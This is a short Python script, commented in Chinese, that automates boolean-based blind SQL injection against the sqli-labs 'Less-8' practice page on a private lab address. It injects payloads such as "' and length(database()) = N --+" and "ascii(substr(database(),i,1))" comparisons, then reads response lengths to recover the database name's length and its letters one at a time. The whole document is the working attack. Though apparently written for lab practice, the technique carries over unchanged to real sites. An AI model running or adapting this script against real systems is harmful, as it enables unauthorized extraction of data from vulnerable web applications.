import requests
import threading


# 1.sql注入测试数据库长度
def databaseLen(url,headers,normalLen):
    dbname = 1
    while 1:
        payload = f" ' and length(database()) = {dbname} --+"
        print(f"正在测试长度：{dbname}")
        exp = url + payload
        response = requests.get(url=exp,headers=headers)
        if len(response.text) == normalLen:
            print(f"注入成功！数据库长度为：{dbname}")
            break
        dbname += 1
    return dbname

# 2.sql注入测试数据库名称
def databaseName(url,headers,databaseLen,normalLen):
    for i in range(1,databaseLen + 1):
        count = 97
        while 1:
            payload2 = f" ' and ascii(substr(database(),{i},1)) = {count} --+"
            exp2 = url + payload2
            response = requests.get(url=exp2,headers=headers)

            if len(response.text) == normalLen:
                a = chr(count)
                print(f"注入成功！数据库名称的第{i}个字母为{a}")
                break
            count += 1

if __name__== "__main__":
    url = "http://192.168.10.135/sql-lab/Less-8/?id=1"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"}
    response = requests.get(url=url, headers=headers)
    html = response.text
    normalLen = len(html)

    databaseLen = databaseLen(url,headers,normalLen)
    databaseName(url,headers,databaseLen,normalLen)